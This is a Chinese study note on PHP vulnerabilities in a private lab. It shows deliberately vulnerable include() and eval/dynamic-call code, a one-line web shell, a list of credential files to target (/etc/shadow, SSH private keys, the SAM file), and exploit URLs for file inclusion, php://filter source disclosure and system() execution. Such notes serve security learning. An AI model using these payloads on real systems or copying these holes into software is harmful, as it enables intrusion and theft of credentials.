学习笔记:php漏洞
一、文件包含漏洞
1、常见包含函数
include(),require(),include_once(),require_once()
2、本地文件包含,新建一个include.php文件,里面输入
<?php
$test=$_GET['c'];
include($test);
?>
3、再新建一个test.txt文件,里面输入:<?php phpinfo()?>
4、访问
192.168.171.128/include.php?c=test.txt
data:image/s3,"s3://crabby-images/27f1e/27f1e8a52a50b22f48b8b33b82f08372a9fa7730" alt=""
5、读取敏感目录文件
data:image/s3,"s3://crabby-images/a9fc7/a9fc79c1f6970c49d1771d5c619d235f4797f663" alt=""
windows:
C:\boot.ini //查看系统版本
C:\WINDOWS\system32\inetsrvMetaBase.xml //IIS配置文件
C:\WINDOWS\repair\sam //存储系统初次安装的密码
C:\WINDOWS\php.ini //php配置信息
C:\WINDOWS\my.ini //mysql配置信息
linux:
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/known_hosts
/etc/passwd
/etc/shadow
/etc/my.cnf
/etc/httpd/conf/httpd.conf
/root/.bash_history
/root/.mysql_history
/proc/mounts
/proc/config.gz
二、远程文件包含
1、将上面新建的test.txt文件放到另一台服务器上192.168.1.103
2、访问
http://192.168.171.128/include.php?c=
http://192.168.1.103/test.txt
data:image/s3,"s3://crabby-images/5a01b/5a01be2a88a30a6ceb62c0215ae40e319b07f135" alt=""
确保php.ini中allow_url_fopen和allow_url_include要为On
三、伪协议利用读取php文件的源码
1、读取test.php文件结果如下
data:image/s3,"s3://crabby-images/b4cd4/b4cd4b7000cf178f476e3ea64bff54bff1968358" alt=""
2、通过伪协议可以获取test.php的源码
http://192.168.171.128/include.php?c=php://filter/read=convert.base64-encode/resource=test.php
data:image/s3,"s3://crabby-images/22d3a/22d3a1aa5b73a3f90c3374c9a0b02277a8ddf471" alt=""
base64解码以后,获取文件源码
data:image/s3,"s3://crabby-images/e6826/e68264c29ef9cdafaef4dff26b845cfd0ee3b069" alt=""
四、代码执行漏洞
1、常见代码执行函数
eval()/assert()/system()/exec()/shell_exec()/passthru()/escapesshellcmd()/pcntl_exec()
例如:<?php eval($_POST[a];?>
2、 获取ip相关信息
http://192.168.171.128/test.php?a=system('ipconfig');
data:image/s3,"s3://crabby-images/c666b/c666b496071acac732e93b7426eaa9e9721b35ae" alt=""
3、动态代码执行
新建test.php,内容为:
<?php
$a=$_GET['a'];
$b=$_GET['b'];
$a($b);
?>
访问:
http://192.168.171.128/test.php?a=system&b=ipconfig
data:image/s3,"s3://crabby-images/5ac8e/5ac8e4301f7d89648d9a8bf03057ae5fea87b91d" alt=""